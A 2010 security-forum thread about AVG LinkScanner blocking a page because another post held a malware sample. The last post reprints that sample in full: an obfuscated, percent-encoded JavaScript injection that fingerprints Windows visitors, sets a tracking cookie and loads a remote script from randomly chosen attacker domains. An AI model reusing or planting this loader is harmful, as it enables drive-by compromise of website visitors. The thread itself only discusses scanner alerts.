AVG LinkScanner blocking access to a page

Discussion in 'General Topics' started by m00nbl00d, Oct 26, 2010.

Thread Status:
Not open for further replies.
  1. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    Hello,

    This thread here, at page 2 is being blocked by AVG LinkScanner.

    Someone must have written the "exploitable code" regarding the threat they were talking about there, making LinkScanner go crazy and not let open the page. Personally, I can only see the top part, which I can't see what I need to report.

    Could someone take a look over there and see which post needs editing, please? I'd like to read the rest of the thread, but going to page 3 without reading page 2 doesn't make much sense. :)

    -Edit-

    It seems to be post #39
    Thank you
     
    Last edited: Oct 26, 2010
  2. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,875
    Location:
    New England
    There is nothing wrong or harmful with any of the posts in that thread. Post #39 has a sample of the Javascript code that was being discussed at the time, however, it is just text residing in a code block. It can not run or cause any problems. If AVG LinkScanner is blocking your access, it is wrong to do so. There is no "exploit" there. There is merely text in a forum post. (This type of alarm/alert is one of the problems with these kinds of scanners. They don't differentiate between actual executable code contained in a webpage and harmless text discussing it.)
     
  3. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    Yes, I'm aware that there's nothing wrong with it, hence the reason I mentioned it as being "exploitable code" and not exploitable code.

    The thing is, LinkScanner is giving the alerts because the it is written within the code tags.

    Just as an example

    Seems not to trigger it.
     
  4. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,875
    Location:
    New England
    I wouldn't say it is "because" of the CODE block, but, rather a CODE block allows for the full contents to be posted without large wrapping issues which might actually break the code - disrupting the scanning.

    I don't know whether QUOTE tags are better because I don't have link scanner here to test it. However, your post may not be triggering it because you only pasted a small amount of the code from that other post. You are missing a lot of it, so, it isn't "complete".

     
  5. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    I was too quick talking. Despite the fact that, indeed, the code was incomplete, LinkScanner still triggered. And quoting is an awful idea, because it will happen what happened. Only know I've seen it.

    I disabled LinkScanner and went to post 39, and

    Code:
    var st1 = 0;document.write(unescape('%3C%73%63%72%69%70%74%3E%76%61%72%20%64%63%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%20%76%61%72%20%63%6E%61%6D%65%20%3D%20%27%77%61%74%63%68%74%69%6D%65%27%3B%20%76%61%72%20%77%6E%20%3D%20%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%3B%20%76%61%72%20%73%74%72%69%20%3D%20%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%3B%20%76%61%72%20%73%74%72%4F%53%20%3D%20%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%63%2E%69%6E%64%65%78%4F%66%28%63%6E%61%6D%65%29%3D%3D%2D%31%20%26%26%20%21%77%6E%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%73%74%72%69%29%20%26%26%20%73%74%72%4F%53%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%27%77%69%6E%27%29%20%21%3D%20%2D%31%29%20%7B%20%76%61%72%20%64%6F%6D%73%20%3D%20%5B%27%65%64%69%73%6F%6E%73%6E%69%67%68%74%63%6C%75%62%2E%63%6F%6D%27%2C%27%65%6D%61%70%69%73%2E%6F%72%67%27%2C%27%69%64%65%61%63%6F%72%65%70%6F%72%74%61%6C%2E%63%6F%6D%27%2C%27%6B%61%72%65%6E%65%67%72%65%6E%2E%63%6F%6D%27%5D%3B%20%76%61%72%20%70%72%65%66%66%73%20%3D%20%5B%27%61%71%75%61%2E%27%2C%27%61%7A%75%72%65%2E%27%2C%27%62%6C%61%63%6B%2E%27%2C%27%62%6C%75%65%2E%27%2C%27%62%72%6F%77%6E%2E%27%2C%27%67%6F%6C%64%2E%27%2C%27%67%72%61%79%2E%27%2C%27%67%72%65%65%6E%2E%27%2C%27%6C%69%6D%65%2E%27%2C%27%6E%61%76%79%2E%27%2C%27%6F%6C%69%76%65%2E%27%2C%27%70%6C%75%6D%2E%27%2C%27%72%65%64%2E%27%2C%27%73%6E%6F%77%2E%27%2C%27%77%68%69%74%65%2E%27%2C%27%79%65%6C%6C%6F%77%2E%27%5D%3B%20%76%61%72%20%64%6F%6D%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%6F%6D%73%2E%6C%65%6E%67%74%68%29%3B%20%76%61%72%20%70%72%65%66%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%70%72%65%66%66%73%2E%6C%65%6E%67%74%68%29%3B%20%64%74%3D%6E%65%77%20%44%61%74%65%28%29%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%20%2B%20%37%2A%33%36%30%30%2A%33%36%30%30%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%63%6E%61%6D%65%2B%27%3D%27%2B%65%73%63%61%70%65%28%63%6E%61%6D%65%29%2B%27%3B%65%78%70%69%72%65%73%3D%27%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%27%3B%70%61%74%68%3D%2F%27%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%70%72%65%66%66%73%5B%70%72%65%66%5D%2B%64%6F%6D%73%5B%64%6F%6D%5D%2B%27%2F%64%61%74%61%2F%6D%6F%6F%74%6F%6F%6C%73%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%3B%20%7D%3B%3C%2F%73%63%72%69%70%74%3E'));var gr0=0;
    This is the complete code.

    Personally, I don't make use of LinkScanner. I'm using a relative's system.
    But, you sure understand that other people making use of LinkScanner, and perhaps similar protections may be shown a red alert and prevented from seeing that page.

    Meantime, I just disabled LinkScanner and opened that page 2 and I am reading it, because it's all I wanted. :)

    But, maybe the text code could be replaced by an image and/or having it in text file that anyone could download and read. Don't know what would be the best idea.

    Anyway, just wanted to give the warning that that page triggers LinkScanner (perhaps could trigger others as well).

    Thank you for your time.

    Regards
     
Loading...
Thread Status:
Not open for further replies.